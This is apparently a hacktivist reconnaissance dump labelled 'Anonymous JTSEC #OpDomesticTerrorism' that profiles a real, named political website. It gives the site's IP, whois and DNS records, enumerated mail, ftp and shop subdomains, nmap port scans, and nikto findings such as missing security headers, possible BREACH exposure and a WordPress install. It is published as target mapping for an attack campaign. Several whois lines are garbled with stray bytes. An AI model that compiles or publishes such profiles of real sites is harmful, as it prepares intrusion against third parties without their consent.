Anonymous JTSEC #OpDomesticTerrorism Full Recon #11

1. #######################################################################################################################################
2. Hostname theredelephants.com ISP Google LLC
3. Continent North America Flag
4. US
5. Country United States Country Code US
6. Region Virginia Local time 07 Nov 2018 23:10 EST
7. City Unknown Postal Code Unknown
8. IP Address 104.196.67.80 Latitude 38.658
9. Longitude -77.25
10. #######################################################################################################################################
11. > theredelephants.com
12. Server: 194.187.251.67
13. Address: 194.187.251.67#53
14.  
15. Non-authoritative answer:
16. Name: theredelephants.com
17. Address: 104.196.67.80
18. #######################################################################################################################################
19. HostIP:104.196.67.80
20. HostName:theredelephants.com
21.  
22. Gathered Inet-whois information for 104.196.67.80
23. ---------------------------------------------------------------------------------------------------------------------------------------
24.  
25.  
26. inetnum: 104.153.88.0 - 104.232.35.255
27. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
28. descr: IPv4 address block not managed by the RIPE NCC
29. remarks: ------------------------------------------------------
30. remarks:
31. remarks: You can find the whois server to query, or the
32. remarks: IANA registry to query on this web page:
33. remarks: http://www.iana.org/assignments/ipv4-address-space
34. remarks:
35. remarks: You can access databases of other RIRs at:
36. remarks:
37. remarks: AFRINIC (Africa)
38. remarks: http://www.afrinic.net/ whois.afrinic.net
39. remarks:
40. remarks: APNIC (Asia Pacific)
41. remarks: http://www.apnic.net/ whois.apnic.net
42. remarks:
43. remarks: ARIN (Northern America)
44. remarks: http://www.arin.net/ whois.arin.net
45. remarks:
46. remarks: LACNIC (Latin America and the Carribean)
47. remarks: http://www.lacnic.net/ whois.lacnic.net
48. remarks:
49. remarks: IANA IPV4 Recovered Address Space
50. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
51. remarks:
52. remarks: ------------------------------------------------------
53. country: EU # Country is really world wide
54. admin-c: IANA1-RIPE
55. tech-c: IANA1-RIPE
56. status: ALLOCATED UNSPECIFIED
57. mnt-by: RIPE-NCC-HM-MNT
58. mnt-lower: RIPE-NCC-HM-MNT
59. created: 2018-08-07T14:17:36Z
60. last-modified: 2018-09-04T13:35:24Z
61. source: RIPE
62.  
63. role: Internet Assigned Numbers Authority
64. address: see http://www.iana.org.
65. admin-c: IANA1-RIPE
66. tech-c: IANA1-RIPE
67. nic-hdl: IANA1-RIPE
68. remarks: For more information on IANA services
69. remarks: go to IANA web site at http://www.iana.org.
70. mnt-by: RIPE-NCC-MNT
71. created: 1970-01-01T00:00:00Z
72. last-modified: 2001-09-22T09:31:27Z
73. source: RIPE # Filtered
74.  
75. % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
76.  
77.  
78.  
79. Gathered Inic-whois information for theredelephants.com
80. ---------------------------------------------------------------------------------------------------------------------------------------
81. Domain Name: THEREDELEPHANTS.COM
82. Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
83. Registrar WHOIS Server: whois.godaddy.com
84. Registrar URL: http://www.godaddy.com
85. Updated Date: 2016-11-10T21:43:26Z
86. Creation Date: 2016-11-10T21:43:26Z
87. Registry Expiry Date: 2019-11-10T21:43:26Z
88. Registrar: GoDaddy.com, LLC
89. Registrar IANA ID: 146
90. Registrar Abuse Contact Email: abuse@godaddy.com
91. Registrar Abuse Contact Phone: 480-624-2505
92. Domain Status: clientDeleteProhibited https:/�U@/ican�~Hn0.or�g/epp#O9jv�clU@ientDU9jv�el�U@etePr�������ohibite�U@d
93. Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
94. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
95. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
96. Name Server: NS57.DOMAINCONTROL.COM
97. Name Server: NS58.DOMAINCONTROL.COM
98. DNSSEC: unsigned
99. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
100. >>> Last update of whois database: 2018-11-08T04jV@:17:2�zH00Z <�<<
101.  
102. For more information on Whois status codes, please visit https://icann.org/epp
103.  
104. NOTICE: The expiration date displayed in this record is the date the
105. registrar's sponsorship of the domain name registration in the registry is
106. currently set to expire. This date does not necessarily reflect the expiration
107. date of the domain name registrant's agreement with the sponsoring
108. �egistrar. Users may consult the sponsoring reg�U@abase�~H 0to
109. view the registrar's reported date of expiration for this registration.
110.  
111. TERMS OF USE: You are not authorized to access or query our Whois
112. database through the use of electronic processes that are high-volume and
113. automated except as reasonably necessary to register domain names or
114. modify existing registrations; the Data in VeriSign Global Registry
115. Services' ("VeriSign") Whois database is provided by VeriSign for
116. information purposes only, and to assist persons�U@matio�~Hn0
117. about or related to a domain name registration record. VeriSign does not
118. guarantee its accuracy. By submitting a Whois query, you agree to abide
119. by the following terms of use: You agree that you may use this Data only
120. for lawful purposes and that under no circumstances will you use this Data
121. to: (1) allow, enable, or otherwise support the transmission of mass
122. unsolicited, commercial advertising or solicitations via e-mail, telephone,
123. or facsimile; or (2) enable high volume, automat�U@ed, e�~Hl0ectgronic �9jv�prU@ocess�9jv�es�U@
124. that apply to VeriSign (or its computer systems). The compilation,
125. repackaging, dissemination or other use of this Data is expressly
126. prohibited without the prior written consent of VeriSign. You agree not to
127. use electronic processes that are automated and high-volume to access or
128. query the Whois database except as reasonably necessary to register
129. domain names or modify existing registrations. VeriSign reserves the right
130. to restrict your access to the Whois database in�U@ its �~Hs0ole discreS:jv�tiU@on toY:jv� e�U@nsure��������
131. operational stability. VeriSign may restrict or terminate your access to the
132. Whois database for failure to abide by these terms of use. VeriSign
133. reserves the right to modify these terms at any time.
134.  
135. The Registry database contains ONLY .COM, .NET, .EDU domains and
136. Registrars.
137.  
138. Gathered Netcraft information for theredelephants.com
139. ---------------------------------------------------------------------------------------------------------------------------------------
140.  
141. Retrieving Netcraft.com information for theredelephants.com
142. Netcraft.com Information gathered
143.  
144. Gathered Subdomain information for theredelephants.com
145. ---------------------------------------------------------------------------------------------------------------------------------------
146. Searching Google.com:80...
147. Searching Altavista.com:80...
148. Found 0 possible subdomain(s) for host theredelephants.com, Searched 0 pages containing 0 results
149.  
150. Gathered E-Mail information for theredelephants.com
151. ---------------------------------------------------------------------------------------------------------------------------------------
152. Searching Google.com:80...
153. Searching Altavista.com:80...
154. Found 0 E-Mail(s) for host theredelephants.com, Searched 0 pages containing 0 results
155.  
156. Gathered TCP Port information for 104.196.67.80
157. ---------------------------------------------------------------------------------------------------------------------------------------
158.  
159. Port State
160.  
161. 80/tcp open
162.  
163. Portscan Finished: Scanned 150 ports, 2 ports were in state closed
164. #######################################################################################################################################
165. [i] Scanning Site: http://theredelephants.com
166.  
167.  
168.  
169. B A S I C I N F O
170. =======================================================================================================================================
171.  
172.  
173. [+] Site Title: Home - The Red Elephants
174. [+] IP address: 104.196.67.80
175. [+] Web Server: Could Not Detect
176. [+] CMS: WordPress
177. [+] Cloudflare: Not Detected
178. [+] Robots File: Found
179.  
180. -------------[ contents ]----------------
181. User-agent: *
182. Disallow: /wp-admin/
183. Allow: /wp-admin/admin-ajax.php
184.  
185. -----------[end of contents]-------------
186.  
187.  
188.  
189. W H O I S L O O K U P
190. =======================================================================================================================================
191.  
192. Domain Name: THEREDELEPHANTS.COM
193. Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
194. Registrar WHOIS Server: whois.godaddy.com
195. Registrar URL: http://www.godaddy.com
196. Updated Date: 2016-11-10T21:43:26Z
197. Creation Date: 2016-11-10T21:43:26Z
198. Registry Expiry Date: 2019-11-10T21:43:26Z
199. Registrar: GoDaddy.com, LLC
200. Registrar IANA ID: 146
201. Registrar Abuse Contact Email: abuse@godaddy.com
202. Registrar Abuse Contact Phone: 480-624-2505
203. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
204. Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
205. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
206. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
207. Name Server: NS57.DOMAINCONTROL.COM
208. Name Server: NS58.DOMAINCONTROL.COM
209. DNSSEC: unsigned
210. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
211. >>> Last update of whois database: 2018-11-08T04:17:34Z <<<
212.  
213. For more information on Whois status codes, please visit https://icann.org/epp
214.  
215.  
216.  
217. The Registry database contains ONLY .COM, .NET, .EDU domains and
218. Registrars.
219.  
220.  
221.  
222.  
223. G E O I P L O O K U P
224. =======================================================================================================================================
225.  
226. [i] IP Address: 104.196.67.80
227. [i] Country: US
228. [i] State: California
229. [i] City: Mountain View
230. [i] Latitude: 37.419201
231. [i] Longitude: -122.057404
232.  
233.  
234.  
235.  
236. H T T P H E A D E R S
237. =======================================================================================================================================
238.  
239.  
240. [i] HTTP/1.1 200 OK
241. [i] Date: Thu, 08 Nov 2018 04:17:49 GMT
242. [i] Content-Type: text/html; charset=UTF-8
243. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
244. [i] Pragma: no-cache
245. [i] Link: <http://theredelephants.com/wp-json/>; rel="https://api.w.org/"
246. [i] Link: <http://theredelephants.com/>; rel=shortlink
247. [i] WPE-Backend: apache
248. [i] X-Cacheable: SHORT
249. [i] Vary: Accept-Encoding,Cookie
250. [i] Cache-Control: max-age=600, must-revalidate
251. [i] X-Pass-Why:
252. [i] X-Cache-Group: normal
253. [i] X-Type: default
254. [i] Connection: close
255.  
256.  
257.  
258.  
259. D N S L O O K U P
260. =======================================================================================================================================
261.  
262. theredelephants.com. 599 IN A 104.196.67.80
263. theredelephants.com. 3599 IN NS ns57.domaincontrol.com.
264. theredelephants.com. 3599 IN NS ns58.domaincontrol.com.
265. theredelephants.com. 599 IN SOA ns57.domaincontrol.com. dns.jomax.net. 2017032701 28800 7200 604800 600
266. theredelephants.com. 599 IN MX 0 theredelephants-com.mail.protection.outlook.com.
267. theredelephants.com. 599 IN TXT "NETORGFT2476217.onmicrosoft.com"
268. theredelephants.com. 599 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
269.  
270.  
271.  
272.  
273. S U B N E T C A L C U L A T I O N
274. =======================================================================================================================================
275.  
276. Address = 104.196.67.80
277. Network = 104.196.67.80 / 32
278. Netmask = 255.255.255.255
279. Broadcast = not needed on Point-to-Point links
280. Wildcard Mask = 0.0.0.0
281. Hosts Bits = 0
282. Max. Hosts = 1 (2^0 - 0)
283. Host Range = { 104.196.67.80 - 104.196.67.80 }
284.  
285.  
286.  
287. N M A P P O R T S C A N
288. =======================================================================================================================================
289.  
290.  
291. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-08 04:17 UTC
292. Nmap scan report for theredelephants.com (104.196.67.80)
293. Host is up (0.056s latency).
294. rDNS record for 104.196.67.80: 80.67.196.104.bc.googleusercontent.com
295. PORT STATE SERVICE
296. 21/tcp filtered ftp
297. 22/tcp filtered ssh
298. 23/tcp filtered telnet
299. 80/tcp open http
300. 110/tcp filtered pop3
301. 143/tcp filtered imap
302. 443/tcp open https
303. 3389/tcp filtered ms-wbt-server
304.  
305. Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
306.  
307.  
308.  
309. S U B - D O M A I N F I N D E R
310. =======================================================================================================================================
311.  
312.  
313. [i] Total Subdomains Found : 1
314.  
315. [+] Subdomain: shop.theredelephants.com
316. [-] IP: 23.227.38.32
317.  
318. #######################################################################################################################################
319. [?] Enter the target: http://theredelephants.com/
320. [!] IP Address : 104.196.67.80
321. [!] CMS Detected : WordPress
322. [+] Honeypot Probabilty: 0%
323. ---------------------------------------------------------------------------------------------------------------------------------------
324. [~] Trying to gather whois information for theredelephants.com
325. [+] Whois information found
326. [-] Unable to build response, visit https://who.is/whois/theredelephants.com
327. ---------------------------------------------------------------------------------------------------------------------------------------
328. [+] Robots.txt retrieved
329. User-agent: *
330. Disallow: /wp-admin/
331. Allow: /wp-admin/admin-ajax.php
332.  
333. ---------------------------------------------------------------------------------------------------------------------------------------
334. PORT STATE SERVICE
335. 21/tcp filtered ftp
336. 22/tcp filtered ssh
337. 23/tcp filtered telnet
338. 80/tcp open http
339. 110/tcp filtered pop3
340. 143/tcp filtered imap
341. 443/tcp open https
342. 3389/tcp filtered ms-wbt-server
343. Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
344. ---------------------------------------------------------------------------------------------------------------------------------------
345.  
346. [+] DNS Records
347. ns58.domaincontrol.com. (173.201.76.29) AS26496 GoDaddy.com, LLC United States
348. ns57.domaincontrol.com. (216.69.185.29) AS26496 GoDaddy.com, LLC United States
349.  
350. [+] MX Records
351. 0 (216.32.181.74) AS8075 Microsoft Corporation United States
352.  
353. [+] Host Records (A)
354. shop.theredelephants.comHTTPS: (23.227.38.32) AS62679 Shopify, Inc. Canada
355. theredelephants.comHTTP: (80.67.196.104.bc.googleusercontent.com) (104.196.67.808) AS15169 Google Inc. United States
356.  
357. [+] TXT Records
358. "NETORGFT2476217.onmicrosoft.com"
359. "v=spf1 include:spf.protection.outlook.com -all"
360.  
361. [+] DNS Map: https://dnsdumpster.com/static/map/theredelephants.com.png
362.  
363. [>] Initiating 3 intel modules
364. [>] Loading Alpha module (1/3)
365. [>] Beta module deployed (2/3)
366. [>] Gamma module initiated (3/3)
367. No emails found
368.  
369. [+] Hosts found in search engines:
370. ---------------------------------------------------------------------------------------------------------------------------------------
371. [-] Resolving hostnames IPs...
372. 23.227.38.32:shop.theredelephants.com
373. [+] Virtual hosts:
374. ---------------------------------------------------------------------------------------------------------------------------------------
375. [~] Crawling the target for fuzzable URLs
376. [-] No fuzzable URLs found
377. #######################################################################################################################################
378. ; <<>> DiG 9.11.5-1-Debian <<>> theredelephants.com
379. ;; global options: +cmd
380. ;; Got answer:
381. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36741
382. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
383.  
384. ;; OPT PSEUDOSECTION:
385. ; EDNS: version: 0, flags:; udp: 4096
386. ;; QUESTION SECTION:
387. ;theredelephants.com. IN A
388.  
389. ;; ANSWER SECTION:
390. theredelephants.com. 569 IN A 104.196.67.80
391.  
392. ;; Query time: 131 msec
393. ;; SERVER: 194.187.251.67#53(194.187.251.67)
394. ;; WHEN: jeu nov 08 00:04:06 EST 2018
395. ;; MSG SIZE rcvd: 64
396. #######################################################################################################################################
397. ; <<>> DiG 9.11.5-1-Debian <<>> +trace theredelephants.com
398. ;; global options: +cmd
399. . 80263 IN NS g.root-servers.net.
400. . 80263 IN NS j.root-servers.net.
401. . 80263 IN NS a.root-servers.net.
402. . 80263 IN NS e.root-servers.net.
403. . 80263 IN NS l.root-servers.net.
404. . 80263 IN NS h.root-servers.net.
405. . 80263 IN NS k.root-servers.net.
406. . 80263 IN NS b.root-servers.net.
407. . 80263 IN NS d.root-servers.net.
408. . 80263 IN NS i.root-servers.net.
409. . 80263 IN NS f.root-servers.net.
410. . 80263 IN NS m.root-servers.net.
411. . 80263 IN NS c.root-servers.net.
412. . 80263 IN RRSIG NS 8 0 518400 20181120220000 20181107210000 2134 . Qylc8NheF7StaTxWEy2yrEXkZ3sAYie5RUTX2TcYvHjtijlLOAonirXt 30YkkBEny9wP6rJvgJUhH2EtdwaMDeUATtJ7m1NYK1NVnHgasFeOLHa2 b0sXr+nazG1FHt11//G9l+9Vip87lbdOYV8lvsNAW6tLlTwLE/qFG7UV IvSAyiMqQT0jY7KKcCcXH8AikdB1G4PRrh01e2WoLAY1AF+1b0Q8N5Pf jHyToT7lBNwhpOnX2YIbRI6Ics++V0c4GY+saKDtXfM9Fq10KSYVxXCT PWl2tkdPqxe31z1GZGGApDSk+zPVXclK1qNwIPBahW6GPMLMG+rEkx+4 QgJuvA==
413. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 131 ms
414.  
415. com. 172800 IN NS d.gtld-servers.net.
416. com. 172800 IN NS e.gtld-servers.net.
417. com. 172800 IN NS f.gtld-servers.net.
418. com. 172800 IN NS h.gtld-servers.net.
419. com. 172800 IN NS j.gtld-servers.net.
420. com. 172800 IN NS c.gtld-servers.net.
421. com. 172800 IN NS l.gtld-servers.net.
422. com. 172800 IN NS k.gtld-servers.net.
423. com. 172800 IN NS b.gtld-servers.net.
424. com. 172800 IN NS m.gtld-servers.net.
425. com. 172800 IN NS a.gtld-servers.net.
426. com. 172800 IN NS g.gtld-servers.net.
427. com. 172800 IN NS i.gtld-servers.net.
428. com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
429. com. 86400 IN RRSIG DS 8 1 86400 20181120220000 20181107210000 2134 . BakYugE3VSP66X4pJ7B+IZtMJaZ6+l4x7NczwBSDfzGKpQum68cPBiF6 KGCfs/cQnWaJHQ4HhS5si2lZnsEisqxjDzX0EV4/Nr7jGHY1ogC/7/S0 gYOnF3Sm0a0kcL4Ia0FrmojatupJN+6ssP9aWuQQiT91VKCxUiXHhJps jd4K+KEX8GInYZi0YH9ZTnsVBC3Ymu7v68NmHcWPU2hHmXitdNbAIlK8 IjbMd8a+WygGyzfwJmQD+J8TaZuHHHrRNMl1wUb6Vz5KsJwgZTo1HTJr CVHP497jOjkHRY/zMoGpJsZVAWc183oSf4Albhea2Wd7xog1B7PDzSl5 06IBjg==
430. ;; Received 1179 bytes from 193.0.14.129#53(k.root-servers.net) in 168 ms
431.  
432. theredelephants.com. 172800 IN NS ns57.domaincontrol.com.
433. theredelephants.com. 172800 IN NS ns58.domaincontrol.com.
434. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
435. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20181112054214 20181105043214 37490 com. VtU+mR9c9/KMSBR8+8jD4tBuYVI02LgCM0l6ajfg0IFDAqgk4pvkQeeu PUolFBvqUhq/skdRtlUSE2SLBl7NqXFu2gzeW+BGQ7qeW/H/C3S2xQfY y+vrQvZXtTGTDRSQ7iKbs+p60HkpC6yW1yO5ZkbB53GLVRmjQDGCRm0i STM=
436. M97LE65T4VBCOL9GK8OQ259L1U482JSH.com. 86400 IN NSEC3 1 1 0 - M97M99PVUO3IC50E5BMAJ36NQ9DFRAGU NS DS RRSIG
437. M97LE65T4VBCOL9GK8OQ259L1U482JSH.com. 86400 IN RRSIG NSEC3 8 2 86400 20181114061819 20181107050819 37490 com. bOEH+NUC9FY/zTM07GGhuE14YrjCoBA4SonI8ErT5UNloBDX4OXKZviH hC/q4pawS1MBhT5Z3+6WcL5puzblZu6t8C16qkVS45dnVsj3D7UawpTc NW+DEBzHnEOBj/VW4AFoPTZI+rNi2UqFJYr3+HvkAEHszJjR/Qv8WfEZ DPA=
438. ;; Received 673 bytes from 192.5.6.30#53(a.gtld-servers.net) in 413 ms
439.  
440. theredelephants.com. 600 IN A 104.196.67.80
441. theredelephants.com. 3600 IN NS ns57.domaincontrol.com.
442. theredelephants.com. 3600 IN NS ns58.domaincontrol.com.
443. ;; Received 116 bytes from 2607:f208:206::1d#53(ns57.domaincontrol.com) in 132 ms
444. #######################################################################################################################################
445. [+] Hosting Info for Website: theredelephants.com
446. [+] Visitors per day: 1,700
447. [+] IP Address: ...
448. [+] IP Reverse DNS (Host): 80.67.196.104.bc.googleusercontent.com
449. [+] Hosting Company: Google Inc
450. [+] Hosting IP Range: 104.196.0.0 - 104.199.255.255 (262,144 ip)
451. [+] Hosting Address: 1600 Amphitheatre Parkway, Mountain View, CA, 94043, US
452. [+] Hosting Country: USA
453. [+] Hosting Phone: +1-650-253-0000
454. [+] Hosting Website: sites.google.com
455. [+] CIDR: 104.196.0.0/14
456. [+] Hosting CIDR: 104.196.0.0/14
457.  
458. [+] NS: ns57.domaincontrol.com
459. [+] NS: ns58.domaincontrol.com
460.  
461. #######################################################################################################################################
462. ...theredelephants-com:empty
463. shop.theredelephants.com:23.227.38.32
464. www.theredelephants.com:104.196.67.80#
465. #######################################################################################################################################
466. Start: 2018-11-08T05:25:42+0000
467. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
468. 1.|-- 45.79.12.202 0.0% 3 0.8 1.0 0.7 1.4 0.4
469. 2.|-- 45.79.12.6 0.0% 3 0.9 0.7 0.6 0.9 0.1
470. 3.|-- 45.79.12.8 0.0% 3 2.2 1.2 0.5 2.2 0.9
471. 4.|-- eqix-da1.google.com 0.0% 3 1.1 9.1 1.1 25.1 13.8
472. 5.|-- 108.170.252.130 0.0% 3 1.6 1.4 1.2 1.6 0.2
473. 6.|-- 108.170.233.117 0.0% 3 2.4 1.9 1.5 2.4 0.5
474. 7.|-- 209.85.240.17 0.0% 3 26.7 22.0 19.4 26.7 4.1
475. 8.|-- 72.14.233.113 0.0% 3 30.0 40.0 30.0 58.7 16.2
476. 9.|-- 72.14.239.183 0.0% 3 30.3 30.0 29.7 30.3 0.3
477. 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
478. 11.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
479. 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
480. 13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
481. 14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
482. 15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
483. 16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
484. 17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
485. 18.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
486. 19.|-- 80.67.196.104.bc.googleusercontent.com 0.0% 3 30.0 30.2 29.9 30.7 0.4
487. #######################################################################################################################################
488. [*] Performing General Enumeration of Domain: theredelephants.com
489. [-] DNSSEC is not configured for theredelephants.com
490. [*] SOA ns57.domaincontrol.com 216.69.185.29
491. [*] NS ns58.domaincontrol.com 173.201.76.29
492. [*] NS ns58.domaincontrol.com 2603:5:22c2::1d
493. [*] NS ns57.domaincontrol.com 216.69.185.29
494. [*] NS ns57.domaincontrol.com 2607:f208:206::1d
495. [*] MX theredelephants-com.mail.protection.outlook.com 216.32.181.106
496. [*] MX theredelephants-com.mail.protection.outlook.com 216.32.181.234
497. [*] A theredelephants.com 104.196.67.80
498. [*] TXT theredelephants.com v=spf1 include:spf.protection.outlook.com -all
499. [*] TXT theredelephants.com NETORGFT2476217.onmicrosoft.com
500. [*] Enumerating SRV Records
501. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 52.112.192.75 443 1
502. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:9::b 443 1
503. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:5::b 443 1
504. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:1::b 443 1
505. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:8::b 443 1
506. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:3::b 443 1
507. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:4::b 443 1
508. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:2::b 443 1
509. [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:7::b 443 1
510. [*] SRV _sipfederationtls._tcp.theredelephants.com sipfed.online.lync.com 52.112.192.75 5061 1
511. [*] SRV _sipfederationtls._tcp.theredelephants.com sipfed.online.lync.com 2603:1027:0:5::b 5061 1
512. [+] 11 Records Found
513. #######################################################################################################################################
514. [*] Processing domain theredelephants.com
515. [+] Getting nameservers
516. 173.201.76.29 - ns58.domaincontrol.com
517. 216.69.185.29 - ns57.domaincontrol.com
518. [-] Zone transfer failed
519.  
520. [+] TXT records found
521. "v=spf1 include:spf.protection.outlook.com -all"
522. "NETORGFT2476217.onmicrosoft.com"
523.  
524. [+] MX records found, added to target list
525. 0 theredelephants-com.mail.protection.outlook.com.
526.  
527. [*] Scanning theredelephants.com for A records
528. 104.196.67.80 - theredelephants.com
529. 52.97.133.216 - autodiscover.theredelephants.com
530. 52.97.133.248 - autodiscover.theredelephants.com
531. 40.100.174.200 - autodiscover.theredelephants.com
532. 52.97.133.168 - autodiscover.theredelephants.com
533. 72.167.218.55 - email.theredelephants.comm
534. 173.201.193.5 - email.theredelephants.com
535. 173.201.192.5 - email.theredelephants.com
536. 173.201.192.148 - email.theredelephants.com
537. 72.167.218.173 - email.theredelephants.com
538. 173.201.193.133 - email.theredelephants.com
539. 68.178.252.148 - email.theredelephants.com
540. 68.178.252.20 - email.theredelephants.com
541. 97.74.135.148 - email.theredelephants.com
542. 68.178.252.133 - email.theredelephants.com
543. 173.201.193.148 - email.theredelephants.com
544. 45.40.130.41 - email.theredelephants.com
545. 173.201.192.133 - email.theredelephants.com
546. 173.201.192.20 - email.theredelephants.com
547. 173.201.193.20 - email.theredelephants.com
548. 72.167.218.183 - email.theredelephants.com
549. 97.74.135.133 - email.theredelephants.com
550. 68.178.252.5 - email.theredelephants.com
551. 72.167.218.45 - email.theredelephants.com
552. 97.74.135.45 - email.theredelephants.com
553. 97.74.135.55 - email.theredelephants.com
554. 45.40.130.40 - email.theredelephants.com
555. 104.196.67.80 - ftp.theredelephants.com
556. 52.112.192.78 - lyncdiscover.theredelephants.com
557. 104.41.216.18 - msoid.theredelephants.com
558. 40.112.64.18 - msoid.theredelephants.com
559. 40.112.64.25 - msoid.theredelephants.com
560. 23.227.38.32 - shop.theredelephants.com
561. 52.112.192.75 - sip.theredelephants.com
562. 104.196.67.80 - www.theredelephants.com
563. #######################################################################################################################################
564. Ip Address Status Type Domain Name Server
565. ---------------------------------------------------------------------------------------------------------------------------------------
566. 72.167.218.55 301 alias email.theredelephants.com
567. 72.167.218.55 301 host email.secureserver.net
568. 173.201.193.5 301 host email.secureserver.net
569. 173.201.192.5 301 host email.secureserver.net
570. 173.201.192.148 301 host email.secureserver.net
571. 72.167.218.173 301 host email.secureserver.net
572. 173.201.193.133 301 host email.secureserver.net
573. 68.178.252.148 301 host email.secureserver.net
574. 68.178.252.20 301 host email.secureserver.net
575. 97.74.135.148 301 host email.secureserver.net
576. 68.178.252.133 301 host email.secureserver.net
577. 173.201.193.148 301 host email.secureserver.net
578. 45.40.130.41 301 host email.secureserver.net
579. 173.201.192.133 301 host email.secureserver.net
580. 173.201.192.20 301 host email.secureserver.net
581. 173.201.193.20 301 host email.secureserver.net
582. 72.167.218.183 301 host email.secureserver.net
583. 97.74.135.133 301 host email.secureserver.net
584. 68.178.252.5 301 host email.secureserver.net
585. 72.167.218.45 301 host email.secureserver.net
586. 97.74.135.45 301 host email.secureserver.net
587. 97.74.135.55 301 host email.secureserver.net
588. 45.40.130.40 301 host email.secureserver.net
589. 104.196.67.80 404 alias ftp.theredelephants.com
590. 104.196.67.80 404 host theredelephants.com
591. 23.227.38.32 301 host shop.theredelephants.com
592. 104.196.67.80 301 alias www.theredelephants.com
593. 104.196.67.80 301 host theredelephants.com
594. #######################################################################################################################################
595. [+] Testing domain
596. www.theredelephants.com 104.196.67.80
597. [+] Dns resolving
598. Domain name Ip address Name server
599. theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
600. Found 1 host(s) for theredelephants.com
601. [+] Testing wildcard
602. Ok, no wildcard found.
603.  
604. [+] Scanning for subdomain on theredelephants.com
605. [!] Wordlist not specified. I scannig with my internal wordlist...
606. Estimated time about 67.29 seconds
607.  
608. Subdomain Ip address Name server
609.  
610. email.theredelephants.com 45.40.130.40 p3plgemwbe26-v05.prod.phx3.secureserver.net
611. ftp.theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
612. www.theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
613.  
614. Found 3 subdomain(s) in 3 host(s) in 259.1 second(s)
615. #######################################################################################################################################
616. ---------------------------------------------------------------------------------------------------------------------------------------
617. + Target IP: 104.196.67.80
618. + Target Hostname: 104.196.67.80
619. + Target Port: 443
620. ---------------------------------------------------------------------------------------------------------------------------------------
621. + SSL Info: Subject: /CN=*.wpengine.com
622. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
623. Issuer: /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=RapidSSL RSA CA 2018
624. + Start Time: 2018-11-08 00:01:53 (GMT-5)
625. ---------------------------------------------------------------------------------------------------------------------------------------
626. + Server: nginx
627. + Server leaks inodes via ETags, header found with file /, fields: 0x5be3223e 0x822
628. + The anti-clickjacking X-Frame-Options header is not present.
629. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
630. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
631. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
632. + No CGI Directories found (use '-C all' to force check all possible dirs)
633. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
634. + Server is using a wildcard certificate: *.wpengine.com
635. + Hostname '104.196.67.80' does not match certificate's names: *.wpengine.com
636. + /wordpress/: A Wordpress installation was found.
637. + 7534 requests: 0 error(s) and 9 item(s) reported on remote host
638. + End Time: 2018-11-08 01:49:16 (GMT-5) (6443 seconds)
639. ---------------------------------------------------------------------------------------------------------------------------------------
640. #######################################################################################################################################
641. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:02 EST
642. Nmap scan report for 104.196.67.80
643. Host is up (0.17s latency).
644. Not shown: 470 filtered ports, 3 closed ports
645. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
646. PORT STATE SERVICE
647. 80/tcp open http
648. 443/tcp open https
